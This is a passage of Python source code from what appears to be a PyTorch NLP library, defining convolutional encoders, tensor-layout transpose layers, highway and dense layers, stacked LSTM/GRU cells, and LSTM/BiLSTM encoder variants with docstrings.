"""
def __init__(self, in_channels: int, out_channels: int, kernel_size: int, bias: bool = True, groups: int = 1, unif: float = 0.0, initializer: Optional[str] = None, activation: Optional[str] = None):
"""Create a 1D conv to produce the same output size as input
:param in_channels: The number of input feature maps
:param out_channels: The number of output feature maps
:param kernel_size: The kernel size
:param bias: Is bias on?
:param groups: Number of conv groups
"""
super().__init__()
end_pad = kernel_size // 2
start_pad = end_pad - 1 if kernel_size % 2 == 0 else end_pad
self.conv = nn.Sequential(
nn.ConstantPad1d((start_pad, end_pad), 0.),
pytorch_conv1d(in_channels, out_channels, kernel_size, unif=unif, initializer=initializer, bias=bias, groups=groups),
get_activation(activation)
)
def forward(self, x: torch.Tensor) -> torch.Tensor:
"""Do convolution1d on an input tensor, `[B, C, T]`
:param x: The input tensor of shape `[B, C, T]`
:return: The output tensor of shape `[B, H, T]`
"""
return self.conv(x)
class ConvEncoder(nn.Module):
"""1D Convolutional layer encoder with given activation function, optional dropout
This module takes in a temporal signal of either shape `[B, C, T]` or `[B, T, C]`, depending on the constructor
and produces an output signal of the same orientation (`[B, H, T]` or `[B, T, H]`, respectively). We default
to `[B, T, H]` orientation to make it more convenient for typical layout, but this requires transposing the last
2 dims before and after the convolution operation.
"""
def __init__(self, insz: int, outsz: int, filtsz: int, pdrop: float = 0.0, activation: str = "relu", bias: bool = True, groups: int = 1, hidden_last=True):
"""Construct the encoder with optional dropout, given activation, and orientation
:param insz: The number of input feature maps
:param outsz: The number of output feature maps (or hidden size)
:param filtsz: The kernel size
:param pdrop: The amount of dropout to apply, this defaults to 0
:param activation: The activation function by name, defaults to `relu`
:param bias: Use bias?
:param groups: How many conv groups. Defaults to 1
:param hidden_last: PyTorch only! If `True` the orientatiation is `[B, T, H]`, o.w. `[B, H, T]` expected
"""
super().__init__()
self.output_dim = outsz
conv = Conv1DSame(insz, outsz, filtsz, bias=bias, groups=groups)
act = get_activation(activation)
dropout = nn.Dropout(pdrop)
if hidden_last:
self.conv = nn.Sequential(BTH2BHT(), conv, act, dropout, BHT2BTH())
else:
self.conv = nn.Sequential(conv, act, dropout)
def forward(self, input: torch.Tensor) -> torch.Tensor:
return self.conv(input)
class ConvEncoderStack(nn.Module):
"""Create a stack of convolutional encoders with residual connections between, using the `ConvEncoder` underneath
This creates an encoder stack of convolutions, finally returning the last temporal output. Each layer uses zero-padding
which causes the output of the convolution at each layer to be the same length.
As in the `ConvEncoder` we support input tensor shapes of `[B, C, T]` or `[B, T, C]` depending on the constructor
initialization, and transpose underneath the input and output of the stack if the orientation is defaulted to
`[B, T, C]`
"""
def __init__(self, insz: int, outsz: int, filtsz: int, nlayers: int = 1, pdrop: float = 0.0, activation: str = "relu", bias: bool = True, groups: int = 1, hidden_last=True):
"""Construct the encoder stack
:param insz: The input number of feature maps
:param outsz: The output number of feature maps
:param filtsz: The kernel size
:param nlayers: The number of layers in the stack (defaults to a single layer)
:param pdrop: The amount of dropout to apply (defaults to `0`)
:param activation: The activation function to use as a string, defaults to `relu`
:param bias: Use bias?
:param groups: How many conv groups. Defaults to 1
:param hidden_last: PyTorch only! If `True` the orientatiation is `[B, T, H]`, o.w. `[B, H, T]` expected
"""
super().__init__()
if hidden_last:
first_layer = nn.Sequential(BTH2BHT(), ConvEncoder(insz, outsz, filtsz, pdrop, activation, bias, groups, hidden_last=False))
else:
first_layer = ConvEncoder(insz, outsz, filtsz, pdrop, activation, bias, groups, hidden_last=False)
subsequent_layer = ResidualBlock(ConvEncoder(outsz, outsz, filtsz, pdrop, activation, bias, groups, hidden_last=False))
self.layers = nn.ModuleList([first_layer] + [copy.deepcopy(subsequent_layer) for _ in range(nlayers - 1)])
if hidden_last:
self.layers.append(BHT2BTH())
self.output_dim = outsz
def forward(self, input: torch.Tensor) -> torch.Tensor:
"""Apply a stack of 1D convolutions with residual connections between them
:param input: A tensor of shape `[B, T, C]` or `[B, C, T]` depending on value of `hidden_last`
:return: A tensor of shape `[B, T, H]` or `[B, H, T]` depending on the value of `hidden_last`
"""
x = input
for layer in self.layers:
x = layer(x)
return x
def bth2bht(t: torch.Tensor) -> torch.Tensor:
"""Transpose the 2nd and 3rd dim of a tensor"""
return t.transpose(1, 2).contiguous()
class BTH2BHT(nn.Module):
"""Utility layer to convert from `[B, T, H]` to `[B, H, T]`
"""
def __init__(self):
super().__init__()
def forward(self, t: torch.Tensor) -> torch.Tensor:
return bth2bht(t)
def tbh2bht(t: torch.Tensor) -> torch.Tensor:
"""Permute the dimensions, first goes to third, second goes to first, last moves to second"""
return t.permute(1, 2, 0).contiguous()
class TBH2BHT(nn.Module):
"""Utility layer to convert from `[T, B, H]` to `[B, H, T]`
"""
def __init__(self):
super().__init__()
def forward(self, t: torch.Tensor) -> torch.Tensor:
return tbh2bht(t)
def tbh2bth(t: torch.Tensor) -> torch.Tensor:
"""Transpose the first 2 dims"""
return t.transpose(0, 1).contiguous()
class TBH2BTH(nn.Module):
"""Utility layer to convert from `[T, B, H]` to `[B, T, H]`
"""
def __init__(self):
super().__init__()
def forward(self, t: torch.Tensor) -> torch.Tensor:
return tbh2bth(t)
def bth2tbh(t: torch.Tensor) -> torch.Tensor:
"""Transpose the first 2 dims"""
return t.transpose(0, 1).contiguous()
class BTH2TBH(nn.Module):
"""Utility layer to convert from `[B, T, H]` to `[T, B, H]`
"""
def __init__(self):
super().__init__()
def forward(self, t: torch.Tensor) -> torch.Tensor:
return bth2tbh(t)
def bht2bth(t: torch.Tensor) -> torch.Tensor:
return t.transpose(1, 2).contiguous()
class BHT2BTH(nn.Module):
"""Utility layer to convert from `[B, H, T]` to `[B, T, H]`
"""
def __init__(self):
super().__init__()
def forward(self, t: torch.Tensor) -> torch.Tensor:
return bht2bth(t)
class ParallelConv(nn.Module):
"""Layer of parallel convolutions with varying filter sizes followed by max over time pooling
This module takes an input tensor of any orientation based on its constructor, and pools its
output to shape `[B, H]`, where `H` is `outsz * len(filtsz)`
"""
def __init__(self, insz: int, outsz: int, filtsz: List[int], activation: str = "relu", input_fmt: str = "bth"):
"""
Constructor for a parallel convolution from any orientation tensor input
:param insz: The number of input feature maps
:param outsz: The number of output feature maps
:param filtsz: The kernel size as a list of parallel filters to apply, e.g. `[3, 4, 5]`
:param activation: An activation function by name to apply
:param input_fmt: A string for the orientation. Valid values are `bth` or `btc` meaning hidden units last,
`bht` or `bct` meaning the temporal dim last or `tbh` or `tbc` meaning the hidden units last and the temporal dim
first
"""
super().__init__()
self.requires_length = False
convs = []
outsz_filts = outsz
self.input_fmt = input_fmt.lower()
if type(outsz) == int:
outsz_filts = len(filtsz) * [outsz]
self.output_dim = sum(outsz_filts)
for i, fsz in enumerate(filtsz):
if fsz % 2 == 0:
conv = Conv1DSame(insz, outsz_filts[i], fsz)
else:
pad = fsz // 2
conv = nn.Conv1d(insz, outsz_filts[i], fsz, padding=pad)
conv = nn.Sequential(
conv,
get_activation(activation)
)
convs.append(conv)
# Add the module so its managed correctly
self.convs = nn.ModuleList(convs)
def transform_input(self, t: torch.Tensor) -> torch.Tensor:
if self.input_fmt == "bth" or self.input_fmt == "btc":
return bth2bht(t)
elif self.input_fmt == "tbh" or self.input_fmt == "tbc":
return tbh2bht(t)
else:
return t
def forward(self, inputs: torch.Tensor) -> torch.Tensor:
"""Transform the input to `[B, C, T]` from any orientation and perform parallel 1D convs and max over time pool
:param inputs: An input tensor of any format specified in the constructor
:return: A `[B, H]` tensor representing the pooled outputs
"""
mots = []
input_bct = self.transform_input(inputs)
for conv in self.convs:
# In Conv1d, data BxCxT, max over time
conv_out = conv(input_bct)
mot, _ = conv_out.max(2)
mots.append(mot)
mots = torch.cat(mots, 1)
return mots # self.conv_drop(mots)
class Highway(nn.Module):
"""Highway layer as defined in https://arxiv.org/abs/1505.00387
"""
def __init__(self, input_size: int, **kwargs):
"""Highway layer constructor
:param input_size: The input hidden size
:param kwargs:
"""
super().__init__()
self.proj = nn.Linear(input_size, input_size)
self.transform = nn.Linear(input_size, input_size)
self.transform.bias.data.fill_(-2.0)
self.output_dim = input_size
def forward(self, input: torch.Tensor) -> torch.Tensor:
"""Take a tensor in and produce the highway layer output
:param input: Input tensor
:return: output tensor
"""
proj_result = torch.relu(self.proj(input))
proj_gate = torch.sigmoid(self.transform(input))
gated = (proj_gate * proj_result) + ((1 - proj_gate) * input)
return gated
def pytorch_linear(in_sz: int, out_sz: int, unif: float = 0, initializer: str = None, bias: bool = True):
"""Utility function that wraps a linear (AKA dense) layer creation, with options for weight init and bias"""
l = nn.Linear(in_sz, out_sz, bias=bias)
if unif > 0:
l.weight.data.uniform_(-unif, unif)
elif initializer == "ortho":
nn.init.orthogonal(l.weight)
elif initializer == "he" or initializer == "kaiming":
nn.init.kaiming_uniform(l.weight)
else:
nn.init.xavier_uniform_(l.weight)
if bias:
l.bias.data.zero_()
return l
class StackedLSTMCell(nn.Module):
"""A stacked LSTM cells applied at a timestep
"""
def __init__(self, num_layers: int, input_size: int, rnn_size: int, dropout: float):
super().__init__()
self.dropout = nn.Dropout(dropout)
self.num_layers = num_layers
self.layers = nn.ModuleList()
for i in range(num_layers):
self.layers.append(nn.LSTMCell(input_size=input_size, hidden_size=rnn_size, bias=False))
input_size = rnn_size
def forward(self, input: torch.Tensor, hidden: torch.Tensor):
"""Apply a stack of LSTMs
:param input: The input to the first LSTM `[B, H]`
:param hidden: The previous `(h, c)` where `h=(h_0, h_1,..)`, `c=(c_0, c_1,..)`
:return: The output and hidden `(h, c)` where `h=(h_0, h_1,..)`, `c=(c_0, c_1,..)`
"""
h_0, c_0 = hidden
hs, cs = [], []
for i, layer in enumerate(self.layers):
h_i, c_i = layer(input, (h_0[i], c_0[i]))
input = h_i
if i != self.num_layers - 1:
input = self.dropout(input)
hs.append(h_i)
cs.append(c_i)
hs = torch.stack(hs)
cs = torch.stack(cs)
return input, (hs, cs)
class StackedGRUCell(nn.Module):
"""A stacked GRU cells applied at a timestep
"""
def __init__(self, num_layers: int, input_size: int, rnn_size: int, dropout: float):
super().__init__()
self.dropout = nn.Dropout(dropout)
self.num_layers = num_layers
self.layers = nn.ModuleList()
for i in range(num_layers):
self.layers.append(nn.GRUCell(input_size=input_size, hidden_size=rnn_size))
input_size = rnn_size
def forward(self, input: torch.Tensor, hidden: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]:
"""Apply a stack of GRUs
:param input: The input to the first LSTM `[B, H]`
:param hidden: The previous `h` where `h=(h_0, h_1,..)`
:return: The output and hidden `h` where `h=(h_0, h_1,..)`
"""
h_0 = hidden
hs = []
for i, layer in enumerate(self.layers):
h_i = layer(input, (h_0[i]))
input = h_i
if i != self.num_layers:
input = self.dropout(input)
hs.append(h_i)
hs = torch.stack(hs)
return input, hs
class Dense(nn.Module):
"""Dense (Linear) layer with optional activation given
This module is the equivalent of the tf.keras.layer.Dense, module with optional activations applied
"""
def __init__(
self,
insz: int,
outsz: int,
activation: Optional[str] = None,
unif: float = 0,
initializer: Optional[str] = None,
):
"""Constructor for "dense" or "linear" layer, with optional activation applied
:param insz: The number of hidden units in the input
:param outsz: The number of hidden units in the output
:param activation: The activation function by name, defaults to `None`, meaning no activation is applied
:param unif: An optional initialization value which can set the linear weights. If given, biases will init to 0
:param initializer: An initialization scheme by string name: `ortho`, `kaiming` or `he`, `xavier` or `glorot`
"""
super().__init__()
self.layer = pytorch_linear(insz, outsz, unif, initializer)
self.activation = get_activation(activation)
self.output_dim = outsz
def forward(self, input: torch.Tensor) -> torch.Tensor:
"""Run a linear projection over the input, followed by an optional activation given by constructor
:param input: the input tensor
:return: the transformed output
"""
return self.activation(self.layer(input))
class WeightTieDense(nn.Module):
"""Do weight tying from the input parameter
This module never copies the weight pointer, it lazily accesses to allow the tied variable to reset its parameters
after initialization. This is helpful for cases where we have LMs and are reloading them after they have been
initially created
"""
def __init__(self, tie: nn.Module, bias=False):
super().__init__()
self.tie = tie
self.transform = self._get_transform(tie)
if bias:
bias = torch.nn.Parameter(torch.zeros(self.transform(self.weight.shape[0])))
else:
bias = None
self.register_parameter("bias", bias)
def _get_transform(self, tie: nn.Module):
emb = getattr(tie, "embeddings", None)
if emb is not None:
return self._identity
return self._transpose
@property
def weight(self):
emb = getattr(self.tie, "embeddings", None)
if emb is not None:
return getattr(emb, "weight")
return getattr(self.tie, "weight")
def _identity(self, x: torch.Tensor) -> torch.Tensor:
return x
def _transpose(self, x: torch.Tensor) -> torch.Tensor:
return x.transpose(0, 1).contiguous()
def forward(self, input: torch.Tensor) -> torch.Tensor:
return F.linear(input, self.transform(self.weight), self.bias)
class ResidualBlock(nn.Module):
"""Create a residual block by wrapping an layer with a residual connection"""
def __init__(self, layer: Optional[nn.Module] = None, **kwargs):
"""Wrap an layer with a residual connection
:param layer: This layer will be applied to the input and added to the input
:param kwargs:
"""
super().__init__()
self.layer = layer
if self.layer is not None and hasattr(layer, "output_dim"):
self.output_dim = layer.output_dim
def forward(self, input: torch.Tensor) -> torch.Tensor:
"""Apply a residual block
:param input: A tensor to use as input and to add to output
:return: The residual connection output
"""
return input + self.layer(input)
class SkipConnection(ResidualBlock):
"""Subclass of ResidualBlock(Dense) with an activation function given
"""
def __init__(self, input_size: int, activation: str = "relu"):
"""Create a `SkipConnection`
:param input_size: The input dimension size
:param activation: A string activation name
"""
super().__init__(None)
self.layer = Dense(input_size, input_size, activation=activation)
self.output_dim = input_size
def rnn_cell(insz: int, hsz: int, rnntype: str, nlayers: int, dropout: float):
"""This is a wrapper function around a stacked RNN cell
:param insz: The input dimensions
:param hsz: The hidden dimensions
:param rnntype: An RNN type `gru` or `lstm`
:param nlayers: The number of layers to stack
:param dropout: The amount of dropout
:return:
"""
if rnntype == "gru":
rnn = StackedGRUCell(nlayers, insz, hsz, dropout)
else:
rnn = StackedLSTMCell(nlayers, insz, hsz, dropout)
return rnn
def pytorch_lstm(
insz: int,
hsz: int,
rnntype: str,
nlayers: int,
dropout: float,
unif: float = 0,
batch_first: bool = False,
initializer: str = None,
) -> torch.nn.LSTM:
"""Wrapper around `torch.nn.LSTM`, mainly for weight initialization options
:param insz: The input dimension
:param hsz: The number of hidden units
:param rnntype: A string description of the type of LSTM: `bi?lstm` or `lstm`
:param nlayers: The number of layers
:param dropout: How much dropout to apply
:param unif: if uniform initialization, what range?
:param batch_first: Should we do the RNN batch first or time first
:param initializer: An optional string representing a style of initialization `ortho`, `he`/`kaiming`, `xavier`/`glorot`
:return: An LSTM
"""
if nlayers == 1:
dropout = 0.0
ndir = 2 if rnntype.startswith("b") else 1
layer_hsz = hsz // ndir
rnn = torch.nn.LSTM(
insz, layer_hsz, nlayers, dropout=dropout, bidirectional=True if ndir > 1 else False, batch_first=batch_first
) # , bias=False)
if initializer == "ortho":
nn.init.orthogonal(rnn.weight_hh_l0)
nn.init.orthogonal(rnn.weight_ih_l0)
elif initializer == "he" or initializer == "kaiming":
nn.init.kaiming_uniform(rnn.weight_hh_l0)
nn.init.kaiming_uniform(rnn.weight_ih_l0)
elif unif > 0:
for weight in rnn.parameters():
weight.data.uniform_(-unif, unif)
else:
nn.init.xavier_uniform_(rnn.weight_hh_l0)
nn.init.xavier_uniform_(rnn.weight_ih_l0)
return rnn
class LSTMEncoderBase(nn.Module):
"""The LSTM encoder is a base for a set of encoders producing various outputs.
All LSTM encoders inheriting this class will trim the input to the max length given in the batch. For example,
if the input sequence is `[B, T, C]` and the `S = max(lengths)` then the resulting sequence, if produced, will
be length `S` (or more precisely, `[B, S, H]`)
*PyTorch Note*: In PyTorch, its more common for the input shape to be temporal length first (`[T, B, H]`) and this
is the PyTorch default. There is an extra parameter in all of these models called `batch_first` which controls this.
Currently, the default is time first (`batch_first=False`), which differs from TensorFlow. To match the TF impl,
set `batch_first=True`.
*PyTorch Note*:
Most `LSTMEncoder` variants just define the `forward`. This module cannot provide the same utility as the
TensorFlow `LSTMEncoder` base right now, because because the JIT isnt handling subclassing of forward properly.
"""
def __init__(
self,
insz: int,
hsz: int,
nlayers: int,
pdrop: float = 0.0,
requires_length: bool = True,
batch_first: bool = False,
unif: float = 0,
initializer: str = None,
**kwargs,
):
"""Produce a stack of LSTMs with dropout performed on all but the last layer.
:param insz: The size of the input
:param hsz: The number of hidden units per LSTM
:param nlayers: The number of layers of LSTMs to stack
:param pdrop: The probability of dropping a unit value during dropout, defaults to 0
:param requires_length: Does this encoder require an input length in its inputs (defaults to `True`)
:param batch_first: PyTorch only! Should we do batch first input or time-first input? Defaults to `False` (differs from TF!)
:param unif: PyTorch only! Initialization parameters for RNN
:param initializer: PyTorch only! A string describing optional initialization type for RNN
"""
super().__init__()
self.requires_length = requires_length
self.batch_first = batch_first
self.nlayers = nlayers
if nlayers == 1:
pdrop = 0.0
self.rnn = torch.nn.LSTM(insz, hsz, nlayers, dropout=pdrop, bidirectional=False, batch_first=batch_first)
if initializer == "ortho":
nn.init.orthogonal(self.rnn.weight_hh_l0)
nn.init.orthogonal(self.rnn.weight_ih_l0)
elif initializer == "he" or initializer == "kaiming":
nn.init.kaiming_uniform(self.rnn.weight_hh_l0)
nn.init.kaiming_uniform(self.rnn.weight_ih_l0)
elif unif > 0:
for weight in self.rnn.parameters():
weight.data.uniform_(-unif, unif)
else:
nn.init.xavier_uniform_(self.rnn.weight_hh_l0)
nn.init.xavier_uniform_(self.rnn.weight_ih_l0)
self.output_dim = hsz
# def forward(self, inputs: Tuple[torch.Tensor, torch.Tensor]) -> Tuple[torch.Tensor, torch.Tensor]:
# tbc, lengths = tensor_and_lengths(inputs)
# packed = torch.nn.utils.rnn.pack_padded_sequence(tbc, lengths, batch_first=self.batch_first)
# output, hidden = self.rnn(packed)
# output, _ = torch.nn.utils.rnn.pad_packed_sequence(output, batch_first=self.batch_first)
# return self.output_fn(output, hidden)
# def output_fn(self, output, state):
# return output, self.extract_top_state(state)
def extract_top_state(self, state: Tuple[torch.Tensor, torch.Tensor]) -> List[torch.Tensor]:
"""Get a view of the top state of shape [B, H]`
:param state:
:return:
"""
# Select the topmost state with -1 and the only direction is forward (select with 0)
top = []
for s in state:
top.append(s.view(self.nlayers, 1, -1, self.output_dim)[-1, 0])
return top
class LSTMEncoderSequence(LSTMEncoderBase):
"""LSTM encoder to produce the transduced output sequence.
Takes a tuple of tensor, shape `[B, T, C]` and a lengths of shape `[B]` and produce an output sequence of
shape `[B, S, H]` where `S = max(lengths)`. The lengths of the output sequence may differ from the input
sequence if the `max(lengths)` given is shorter than `T` during execution.
*PyTorch Note:* The input shape of is either `[B, T, C]` or `[T, B, C]` depending on the value of `batch_first`,
and defaults to `[T, B, C]` for consistency with other PyTorch modules. The output shape is of the same orientation.
"""
def forward(self, inputs: Tuple[torch.Tensor, torch.Tensor]) -> torch.Tensor:
"""Take in a tuple of `(sequence, lengths)` and produce and output tensor of the last layer of LSTMs
The value `S` here is defined as `max(lengths)`, `S <= T`
:param inputs: sequence of shapes `[B, T, C]` or `[T, B, C]` and a lengths of shape `[B]`
:return: A tensor of shape `[B, S, H]` or `[S, B, H]` depending on setting of `batch_first`
"""
tbc, lengths = inputs
packed = torch.nn.utils.rnn.pack_padded_sequence(tbc, lengths.cpu(), batch_first=self.batch_first)
output, hidden = self.rnn(packed)
output, _ = torch.nn.utils.rnn.pad_packed_sequence(output, batch_first=self.batch_first)
return output
class LSTMEncoderWithState(nn.Module):
"""LSTM encoder producing the hidden state and the output, where the input doesnt require any padding
PyTorch note: This type of encoder doesnt inherit the `LSTMEncoderWithState` base
"""
def __init__(
self,
insz: int,
hsz: int,
nlayers: int,
pdrop: float = 0.0,
batch_first: bool = False,
unif: float = 0,
initializer: str = None,
**kwargs,
):
"""
:param insz: The size of the input
:param hsz: The number of hidden units per LSTM
:param nlayers: The number of layers of LSTMs to stack
:param pdrop: The probability of dropping a unit value during dropout, defaults to 0
:param batch_first: PyTorch only! do batch first or time-first input? Defaults to `False` (differs from TF!)
:param unif: PyTorch only! Initialization parameters for RNN
:param initializer: PyTorch only! A string describing optional initialization type for RNN
"""
super().__init__()
self.requires_length = False
self.requires_state = True
self.batch_first = batch_first
self.nlayers = nlayers
if nlayers == 1:
pdrop = 0.0
self.rnn = torch.nn.LSTM(insz, hsz, nlayers, dropout=pdrop, bidirectional=False, batch_first=batch_first)
if initializer == "ortho":
nn.init.orthogonal(self.rnn.weight_hh_l0)
nn.init.orthogonal(self.rnn.weight_ih_l0)
elif initializer == "he" or initializer == "kaiming":
nn.init.kaiming_uniform(self.rnn.weight_hh_l0)
nn.init.kaiming_uniform(self.rnn.weight_ih_l0)
elif unif > 0:
for weight in self.rnn.parameters():
weight.data.uniform_(-unif, unif)
else:
nn.init.xavier_uniform_(self.rnn.weight_hh_l0)
nn.init.xavier_uniform_(self.rnn.weight_ih_l0)
self.output_dim = hsz
def forward(self, input_and_prev_h: Tuple[torch.Tensor, torch.Tensor]) -> Tuple[torch.Tensor, torch.Tensor]:
"""
:param input_and_prev_h: The input at this timestep and the previous hidden unit or `None`
:return: Raw `torch.nn.LSTM` output
"""
inputs, hidden = input_and_prev_h
output, hidden = self.rnn(inputs, hidden)
return output, hidden ##concat_state_dirs(hidden)
class LSTMEncoderAll(LSTMEncoderBase):
"""LSTM encoder that passes along the full output and hidden states for each layer
Takes a tuple containing a tensor input of shape `[B, T, C]` and lengths of shape `[B]`
This returns a 2-tuple of outputs `[B, S, H]` where `S = max(lengths)`, for the output vector sequence,
and a tuple of hidden vector `[L, B, H]` and context vector `[L, B, H]`, respectively
*PyTorch note*: Takes a vector of shape `[B, T, C]` or `[B, C, T]`, depending on input specification
of `batch_first`. Also note that in PyTorch, this defaults to `True`
"""
def forward(self, inputs: Tuple[torch.Tensor, torch.Tensor]) -> Tuple[torch.Tensor, torch.Tensor]:
"""
:param inputs: A tuple containing the input tensor `[B, T, C]` or `[B, H, C]` and a length `[B]`
:return: An output tensor `[B, S, H]` or `[B, H, S]` , and tuple of hidden `[L, B, H]` and context `[L, B, H]`
"""
tbc, lengths = inputs
packed = torch.nn.utils.rnn.pack_padded_sequence(tbc, lengths.cpu(), batch_first=self.batch_first)
output, hidden = self.rnn(packed)
output, _ = torch.nn.utils.rnn.pad_packed_sequence(output, batch_first=self.batch_first)
return output, hidden
class LSTMEncoderHidden(LSTMEncoderBase):
"""LSTM encoder that returns the top hidden state
Takes a tuple containing a tensor input of shape `[B, T, C]` and lengths of shape `[B]` and
returns a hidden unit tensor of shape `[B, H]`
*PyTorch note*: Takes a vector of shape `[B, T, C]` or `[B, C, T]`, depending on input specification
of `batch_first`. Also note that in PyTorch, this defaults to `True`
"""
def forward(self, inputs: Tuple[torch.Tensor, torch.Tensor]) -> torch.Tensor:
"""
:param inputs: A tuple containing the input tensor `[B, T, C]` or `[B, H, C]` and a length `[B]`
:return: An output tensor of shape `[B, H]` representing the last RNNs hidden state
"""
tbc, lengths = inputs
packed = torch.nn.utils.rnn.pack_padded_sequence(tbc, lengths.cpu(), batch_first=self.batch_first)
output, hidden = self.rnn(packed)
output, _ = torch.nn.utils.rnn.pad_packed_sequence(output, batch_first=self.batch_first)
return self.extract_top_state(hidden)[0]
# TODO: this module only exists in pytorch. Do we eliminate it or put it in both?
class LSTMEncoderSequenceHiddenContext(LSTMEncoderBase):
def forward(self, inputs: Tuple[torch.Tensor, torch.Tensor]) -> Tuple[torch.Tensor, torch.Tensor]:
tbc, lengths = inputs
packed = torch.nn.utils.rnn.pack_padded_sequence(tbc, lengths.cpu(), batch_first=self.batch_first)
output, hidden = self.rnn(packed)
output, _ = torch.nn.utils.rnn.pad_packed_sequence(output, batch_first=self.batch_first)
return output, self.extract_top_state(hidden)
class BiLSTMEncoderBase(nn.Module):
"""BiLSTM encoder base for a set of encoders producing various outputs.
All BiLSTM encoders inheriting this class will trim the input to the max length given in the batch. For example,
if the input sequence is `[B, T, C]` and the `S = max(lengths)` then the resulting sequence, if produced, will
be length `S` (or more precisely, `[B, S, H]`). Because its bidirectional, half of the hidden units given in the
constructor will be applied to the forward direction and half to the backward direction, and these will get
concatenated.
*PyTorch Note*: In PyTorch, its more common for the input shape to be temporal length first (`[T, B, H]`) and this
is the PyTorch default. There is an extra parameter in all of these models called `batch_first` which controls this.
Currently, the default is time first (`batch_first=False`), which differs from TensorFlow. To match the TF impl,
set `batch_first=True`.
*PyTorch Note*:
Most `BiLSTMEncoder` variants just define the `forward`. This module cannot provide the same utility as the
TensorFlow `BiLSTMEncoder` base right now, because because the JIT isnt handling subclassing of forward properly.
"""
def __init__(
self,
insz: int,
hsz: int,
nlayers: int,
pdrop: float = 0.0,
requires_length: bool = True,
batch_first: bool = False,
unif: float = 0,
initializer: str = None,
**kwargs,
):
"""Produce a stack of LSTMs with dropout performed on all but the last layer.
:param insz: The size of the input
:param hsz: The number of hidden units per BiLSTM (`hsz//2` used for each direction and concatenated)
:param nlayers: The number of layers of BiLSTMs to stack
:param pdrop: The probability of dropping a unit value during dropout, defaults to 0
:param requires_length: Does this encoder require an input length in its inputs (defaults to `True`)
:param batch_first: Should we do batch first input or time-first input? Defaults to `False` (differs from TF!)
:param unif: PyTorch only! Initialization parameters for RNN
:param initializer: PyTorch only! A string describing optional initialization type for RNN
"""
super().__init__()
self.requires_length = requires_length
self.batch_first = batch_first
self.nlayers = nlayers
if nlayers == 1:
pdrop = 0.0
self.rnn = torch.nn.LSTM(insz, hsz // 2, nlayers, dropout=pdrop, bidirectional=True, batch_first=batch_first)
if initializer == "ortho":
nn.init.orthogonal(self.rnn.weight_hh_l0)
nn.init.orthogonal(self.rnn.weight_ih_l0)
elif initializer == "he" or initializer == "kaiming":
nn.init.kaiming_uniform(self.rnn.weight_hh_l0)
nn.init.kaiming_uniform(self.rnn.weight_ih_l0)
elif unif > 0:
for weight in self.rnn.parameters():
weight.data.uniform_(-unif, unif)
else:
nn.init.xavier_uniform_(self.rnn.weight_hh_l0)
nn.init.xavier_uniform_(self.rnn.weight_ih_l0)
self.output_dim = hsz
def extract_top_state(self, state):
# Select the topmost state with -1 and the only direction is forward (select with 0)
return tuple(s.view(self.nlayers, 1, -1, self.output_dim)[-1, 0] for s in state)
# TODO: this module only exists in pytorch. Do we eliminate it or put it in both?
class BiLSTMEncoderSequenceHiddenContext(BiLSTMEncoderBase):
def forward(self, inputs: Tuple[torch.Tensor, torch.Tensor]) -> Tuple[torch.Tensor, torch.Tensor]:
tbc, lengths = inputs
packed = torch.nn.utils.rnn.pack_padded_sequence(tbc, lengths.cpu(), batch_first=self.batch_first)
output, hidden = self.rnn(packed)
output, _ = torch.nn.utils.rnn.pad_packed_sequence(output, batch_first=self.batch_first)
return output, self.extract_top_state(concat_state_dirs(hidden))
class BiLSTMEncoderAll(BiLSTMEncoderBase):
"""BiLSTM encoder that passes along the full output and hidden states for each layer
Takes a tuple containing a tensor input of shape `[B, T, C]` and lengths of shape `[B]`
This returns a 2-tuple of outputs `[B, S, H]` where `S = max(lengths)`, for the output vector sequence,
and a tuple of hidden vector `[L, B, H]` and context vector `[L, B, H]`, respectively
*PyTorch note*: Takes a vector of shape `[B, T, C]` or `[B, C, T]`, depending on input specification
of `batch_first`. Also note that in PyTorch, this defaults to `True`
"""
def forward(self, inputs: Tuple[torch.Tensor, torch.Tensor]) -> Tuple[torch.Tensor, torch.Tensor]:
"""
:param inputs: A tuple containing the input tensor `[B, T, C]` or `[B, H, C]` and a length `[B]`
:return: An output tensor `[B, S, H] or `[B, H, S]` , and tuple of hidden `[L, B, H]` and context `[L, B, H]`
"""
tensor, lengths = inputs
packed = torch.nn.utils.rnn.pack_padded_sequence(tensor, lengths.cpu(), batch_first=self.batch_first)
output, hidden = self.rnn(packed)
output, _ = torch.nn.utils.rnn.pad_packed_sequence(output, batch_first=self.batch_first)
return output, concat_state_dirs(hidden)
class BiLSTMEncoderSequence(BiLSTMEncoderBase):
"""BiLSTM encoder to produce the transduced output sequence.
Takes a tuple of tensor, shape `[B, T, C]` and a lengths of shape `[B]` and produce an output sequence of
shape `[B, S, H]` where `S = max(lengths)`. The lengths of the output sequence may differ from the input
sequence if the `max(lengths)` given is shorter than `T` during execution.
*PyTorch Note:* The input shape of is either `[B, T, C]` or `[T, B, C]` depending on the value of `batch_first`,
and defaults to `[T, B, C]` for consistency with other PyTorch modules. The output shape is of the same orientation.
"""
def forward(self, inputs: Tuple[torch.Tensor, torch.Tensor]) -> torch.Tensor:
"""Take in a tuple of `(sequence, lengths)` and produce and output tensor of the last layer of LSTMs
The value `S` here is defined as `max(lengths)`, `S <= T`
:param inputs: sequence of shapes `[B, T, C]` or `[T, B, C]` and a lengths of shape `[B]`
:return: A tensor of shape `[B, S, H]` or `[S, B, H]` depending on setting of `batch_first`
"""
tensor, lengths = inputs
packed = torch.nn.utils.rnn.pack_padded_sequence(tensor, lengths.cpu(), batch_first=self.batch_first)
output, hidden = self.rnn(packed)
output, _ = torch.nn.utils.rnn.pad_packed_sequence(output, batch_first=self.batch_first)
return output
class BiLSTMEncoderHidden(BiLSTMEncoderBase):
"""BiLSTM encoder that returns the top hidden state
Takes a tuple containing a tensor input of shape `[B, T, C]` and lengths of shape `[B]` and
returns a hidden unit tensor of shape `[B, H]`
*PyTorch note*: Takes a vector of shape `[B, T, C]` or `[B, C, T]`, depending on input specification
of `batch_first`. Also note that in PyTorch, this defaults to `True`
"""
def forward(self, inputs):
"""
:param inputs: A tuple containing the input tensor `[B, T, C]` or `[B, H, C]` and a length `[B]`
:return: An output tensor of shape `[B, H]` representing the last RNNs hidden state
"""
tensor, lengths = inputs
packed = torch.nn.utils.rnn.pack_padded_sequence(tensor, lengths.cpu(), batch_first=self.batch_first)
output, hidden = self.rnn(packed)
output, _ = torch.nn.utils.rnn.pad_packed_sequence(output, batch_first=self.batch_first)
return self.extract_top_state(concat_state_dirs(hidden))[0]
# TODO: Add this to TF or remove
